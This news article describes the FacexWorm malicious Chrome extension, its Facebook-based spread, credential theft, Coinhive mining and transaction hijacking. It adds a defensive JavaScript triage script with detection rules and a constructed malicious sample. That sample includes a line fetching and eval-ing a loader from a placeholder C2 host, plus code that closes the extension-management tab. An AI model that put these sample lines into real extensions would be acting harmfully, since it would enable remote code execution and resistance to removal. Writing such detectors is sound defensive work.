
Another day, another security issue. This time it is FacexWorm, a malicious Chrome extension that has reappeared, targeting cryptocurrency platforms and stealing users' data.
FacexWorm is an old worm, first detected in August 2017. Reappearing in April, it has been increasing its activities in Germany, Tunisia, Japan, Taiwan, South Korea, and Spain. Just like the original, it sends socially-engineered links to friends of affected Facebook users, spreading via Facebook Messenger.
But unlike the original, this worm steals accounts and credentials related to FacexWorm's targeted sites.
The extension takes victims to websites into which it injects malicious cryptojacking code, then redirects them to the attacker's referral link for crypto-related referral programs. The cybercriminals also hijack victims' transactions on trading platforms by replacing the recipient address with the attacker's.
As a result, the attacker gets a referral incentive each time a victim registers an account, researchers from Trend Micro report.
Targeted websites include Binance, DigitalOcean, FreeBitco.in, FreeDoge.co.in, and HashFlare.

FacexWorm first arrives on victims' machines through socially-engineered Facebook links. Those who click the links are redirected to a fake YouTube page, where they are prompted to install a codec extension (FacexWorm) in order to play a video.
The extension requests permission to access and edit data on the site.
The trouble starts once the permission the worm asks for is granted.
FacexWorm can then download malicious code from its command-and-control server, open Facebook's website, and check whether its propagation function is turned on. If it is, the extension requests an OAuth token from Facebook.
It then performs a sequence of queries to collect the victims' friend list, and sends fake YouTube video links again to contacts who are online or idle.

"FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine," explained Trend Micro fraud researcher Joseph Chen in a blog post. "Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage."
This JavaScript code is an obfuscated Coinhive script miner connected to a Coinhive pool, configured to use 20 percent of the target system's CPU power.
FacexWorm has the capability of preventing itself from being removed by the victims. If FacexWorm detects that the user is opening the Chrome extension management page via chrome://extensions/, it will immediately close the opened tab as a precaution.

This prevents users from accessing Chrome's management page address.
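The self-protection and remote-loader behaviour described above gives a defender something concrete to look for when reviewing an unpacked extension. The following static triage script is an added example, not code from Trend Micro's report or from the worm itself; its rule names, regexes, the hypothetical `C2` placeholder in the sample, and both sample extensions are constructed for illustration.

```javascript
// Rules are defender-side heuristics for the behaviours described above; the
// names, regexes and sample inputs are constructed for this example.
const RULES = [
  {
    id: 'blocks-extension-manager',
    note: 'closes tabs that navigate to chrome://extensions',
    test: ({ scripts }) =>
      /chrome:\/\/extensions/.test(scripts) && /tabs\.remove\s*\(/.test(scripts),
  },
  {
    id: 'remote-code-loader',
    note: 'fetches a script from a remote host and executes it on page load',
    test: ({ scripts }) =>
      /tabs\.onUpdated/.test(scripts) &&
      /\b(fetch|XMLHttpRequest)\b/.test(scripts) &&
      /\b(eval|Function)\s*\(|executeScript/.test(scripts),
  },
  {
    id: 'cryptominer-reference',
    note: 'references the Coinhive in-browser miner',
    test: ({ scripts }) => /coinhive/i.test(scripts),
  },
  {
    id: 'all-sites-access',
    note: 'manifest asks to read and change data on all websites',
    test: ({ manifest }) =>
      (manifest.permissions || []).some((p) => p === '<all_urls>' || /^\*:\/\/\*\//.test(p)),
  },
];

// Join the script files and run every rule over manifest plus combined source.
// Two or more hits is enough to pull the extension for manual review.
function triageExtension(manifest, scriptSources) {
  const ctx = { manifest, scripts: scriptSources.join('\n') };
  const hits = RULES.filter((r) => r.test(ctx)).map((r) => r.id);
  return { hits, verdict: hits.length >= 2 ? 'suspicious' : 'clean' };
}

// Constructed sample: a "codec" extension with the traits the report describes.
const SUSPECT_MANIFEST = { name: 'Video Codec', permissions: ['tabs', '<all_urls>'] };
const SUSPECT_SCRIPTS = [
  "chrome.tabs.onUpdated.addListener((id, _c, tab) => { if (tab.url.startsWith('chrome://extensions')) chrome.tabs.remove(id); });",
  "chrome.tabs.onUpdated.addListener(() => fetch(C2 + '/loader.js').then((r) => r.text()).then((src) => eval(src)));",
  '// CoinHive.Anonymous(siteKey, { throttle: 0.8 })',
];
// Constructed sample: a benign extension that only touches its own storage.
const BENIGN_MANIFEST = { name: 'Volume Memory', permissions: ['storage'] };
const BENIGN_SCRIPTS = ["chrome.storage.sync.get('volume', (v) => applyVolume(v));"];
console.log(triageExtension(SUSPECT_MANIFEST, SUSPECT_SCRIPTS)); // verdict 'suspicious', 4 hits
console.log(triageExtension(BENIGN_MANIFEST, BENIGN_SCRIPTS)); // verdict 'clean', 0 hits
```

The sample strings are scanned as text, never executed, so the script can be pointed at a real unpacked extension directory by reading its manifest.json and script files into the same two arguments.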
Both the Chrome Web Store and Facebook Messenger can detect such malicious activity, but they were not fast enough at blocking and removing it.
Trend Micro advised users to practice good security habits to avoid falling victim to this threat or anything similar.
"Think before sharing, be more prudent against unsolicited or suspicious messages, and enable tighter privacy settings for your social media accounts."